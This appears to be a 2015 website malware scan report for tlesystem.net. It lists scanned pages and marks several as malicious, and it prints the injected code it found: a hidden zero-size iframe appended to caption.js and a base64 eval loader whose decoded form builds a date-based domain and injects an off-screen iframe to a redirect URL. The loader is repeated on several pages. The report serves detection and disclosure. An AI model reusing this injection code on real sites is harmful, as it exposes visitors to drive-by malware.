Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tlesystem.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tlesystem.net/ | 200 OK Content-Length: 23933 Content-Type: text/html | clean |
http://www.tlesystem.net/media/system/js/caption.js | 200 OK Content-Length: 1935 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.style.width = width + "px"; } }); document.caption = null window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://pr'+'an'+'tijk'+'e'+'lav'+'anim'+'an'+'dal.'+'org/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://www.tlesystem.net/templates/ja_larix/scripts/ja.script.js | 200 OK Content-Length: 5744 Content-Type: application/javascript | clean |
http://www.tlesystem.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js | 200 OK Content-Length: 1158 Content-Type: application/javascript | clean |
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js | 200 OK Content-Length: 54053 Content-Type: text/javascript | clean |
http://www.tlesystem.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js | 200 OK Content-Length: 6141 Content-Type: application/javascript | clean |
http://www.tlesystem.net/index.php | 200 OK Content-Length: 53897 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/modules/mod_virtuemart/vm_transmenu/transmenu.js | 200 OK Content-Length: 33382 Content-Type: application/javascript | clean |
http://www.tlesystem.net/templates/ja_larix/scripts/vm_stuff.js | 200 OK Content-Length: 702 Content-Type: application/javascript | clean |
http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Jan 2015 21:13:50 GMT Location: http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart&vmcchk=1 Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 15 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 3d2e90a90b97134a7f209b432503405e=3kk81ufd2og6ngpn1crfhakh07; path=/ Set-Cookie: virtuemart=3kk81ufd2og6ngpn1crfhakh07 X-Powered-By: PHP/5.3.27 | clean |
http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart&vmcchk=1 | 200 OK Content-Length: 32278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 56266 Content-Type: text/javascript | clean |
http://www.tlesystem.net/index.php/component/virtuemart/ | 200 OK Content-Length: 34989 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 36551 Content-Type: text/javascript | clean |
http://www.tlesystem.net/index.php/home-tlesystem | 200 OK Content-Length: 54124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/index.php/ | 200 OK Content-Length: 53898 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tlesystem.net
Result:
GET / HTTP/1.1
Host: tlesystem.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tlesystem.net
Referer: http://www.google.com/search?q=tlesystem.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tlesystem.net
Referer: http://www.google.com/search?q=tlesystem.net
Result:
The result is similar to the first query. There are no suspicious redirects found.